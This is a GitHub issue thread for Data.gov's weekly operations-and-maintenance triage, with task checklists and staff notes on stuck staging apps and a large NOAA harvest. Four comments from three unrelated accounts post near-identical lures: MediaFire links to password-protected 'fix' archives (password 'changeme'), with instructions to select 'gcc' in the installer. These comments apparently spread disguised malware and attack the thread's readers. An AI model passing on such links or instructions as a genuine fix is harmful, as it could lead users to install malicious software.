### ISSUE TITLE
O+M 2024-08-26

### ISSUE THREAD

**Issue by FuhuXia** [GSA/data.gov#4864]
As part of day-to-day operation of Data.gov, there are many [Operation and Maintenance (O&M) responsibilities](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities). Instead of having the entire team watching notifications and risking some notifications slipping through the cracks, we have created an [O&M Triage role](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities#om-triage-rotation). One person on the team is assigned the Triage role which rotates each sprint. _This is not meant to be a 24/7 responsibility, only East Coast business hours. If you are unavailable, please note when you will be unavailable in Slack and ask for someone to take on the role for that time._

Check the [O&M Rotation Schedule](https://docs.google.com/spreadsheets/d/1cF73HkzFuQth3z9voLfVO1Cc4kjBd6ecHGE2gkj5LCc/edit?usp=sharing) for future planning.

## Acceptance criteria
You are responsible for all [O&M responsibilities](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities) this week. We've highlighted a few so they're not forgotten. You can copy each checklist into your daily report.

## Daily Checklist
- [ ] [Check Production State/Actions](https://github.com/GSA/data.gov#datagov-actions)
> **Note: Catalog Auto Tasks**
> You will need to update the chart values manually. Click the Action link in each issue and grab the values from `monitor task output` and `check runtime`.
- [ ] [Check auto generated O&M tickets](https://github.com/orgs/GSA/projects/11?pane=issue&itemId=47716346) from no status column
- [ ] Check [Harvesting Emails](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities#harvest-job-report-daily-email-report)
- [x] [New Relic Alerts](https://alerts.newrelic.com/accounts/1601367/incidents) Triaged
- [ ] Triage DMARC Report from Google

## Weekly Checklist
- [ ] [DB-Solr Sync](https://github.com/GSA/catalog.data.gov/issues/848)
- [x] [Audit Log](https://docs.google.com/spreadsheets/d/1z6lqmyNxC7s5MiTt9f6vT41IS2DLLJl4HwEqXvvft40/edit) (more info on [AU-3 and AU-6 Log auditing](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities#au-3-and-au-6-log-auditing))
- [x] [Tracking Update](https://github.com/GSA/catalog.data.gov/issues/847)
    - NOTE: This job will consistently timeout, but it is processing results ((more details)[https://github.com/GSA/data.gov/issues/4345])
- [ ] Check [Catalog Solr](https://github.com/GSA/data.gov/wiki/Operation-and-Maintenance-Responsibilities#solr)
- [x] [Catalog Dupe Check](https://github.com/GSA/data.gov/wiki/Operation-and-Maintenance-Responsibilities#duplicate-check)
- [ ] [Check user management requests](https://github.com/GSA/datagov-account-management/issues)
- [x] [Check Snyk Dashboard and cleanup](https://github.com/GSA/data.gov/wiki/Dependency-scanning#weekly-review)

## Monthly Checklist
- [ ] [Invicti Scan](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities#netsparker-compliance-scan-report-from-isso)

## ad-hoc checklist
- [ ] audit/review applications on cloud foundry and determine what can be stopped and/or deleted. 

## Reference
-   Watch for user email requests
-   Watch in [#datagov-alerts](https://gsa-tts.slack.com/archives/C4RGAM1Q8) and [Vulnerable dependency notifications (daily email reports)](https://github.com/gsa/data.gov/wiki/Operation-and-Maintenance-Responsibilities#vulnerable-dependency-notifications-daily-email-reports) for critical alerts.
-   Monitor and improve [Data.gov O&M Dashboard](https://onenr.io/0LREMrzdrRa)
-   Update and revise [Data.gov O&M Tasks](https://docs.google.com/document/d/1SVkY7SUhkcu6IAXIyuVo-s_E_Z400Is1JG9v5rbI7mI/edit?usp=sharing)

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FuhuXia** [comment]
`catalog-gather` and `catalog-fetch` in staging are stuck, no deployment can go thru.
```
catalog-fetch          started           web:0/0, web:0/0   
catalog-gather         started           web:0/0, web:0/0   
```

**Comment by FuhuXia** [comment]
Deleted staging `catalog-gather` and `catalog-fetch`. Deployment is fine now.

**Comment by FuhuXia** [comment]
After deployment, `catalog-gather` and `catalog-fetch` are back to stuck state `web:0/0, web:0/0`.

**Comment by FuhuXia** [comment]
setting instance 1 (instead of 0) for `catalog-gather` and `catalog-fetch` is the workaround. 
https://github.com/GSA/catalog.data.gov/pull/1439

**Comment by FuhuXia** [comment]
set IMLS to manual schedule and marked it as a broken source, since there is no response to our request to unblock harvesting traffic.
https://github.com/GSA/data.gov/issues/4799#issuecomment-2187000549

**Comment by FuhuXia** [comment]
monthly harvest [ioos](https://catalog.data.gov/harvest/ioos) with 30k+ records just refreshed all its timestamps to `2024-08-25` in source https://data.noaa.gov/waf/NOAA/ioos/iso/xml/ . 
```
Sent 33790 objects to the fetch queue
```

**UPDATE**:
It finished after 3+ days. The scary part is that it appears the timestamp changes are mpstly legit due to file content change, not simple refreshing. 


![image](https://github.com/user-attachments/assets/672a43a9-5b40-44a7-902a-5c0608a19e29)

Some (1127 to be exact, 3.5% ) are caught as simple file refreshing, for exchange this one
https://data.noaa.gov/waf/NOAA/ioos/iso/xml/world_equator.xml, `timestamped 2024-08-25`  but `<gmd:dateStamp> 2021-03-30`

![image](https://github.com/user-attachments/assets/4db895d0-3af1-4bdb-8d3d-3f89c4529b48)

**Comment by rshewitt** [comment]
apparently i don't have edit access to the audit log. ooooooooooof. can someone grant me that?

**Comment by FuhuXia** [comment]
> apparently i don't have edit access to the audit log. ooooooooooof. can someone grant me that?

Done.
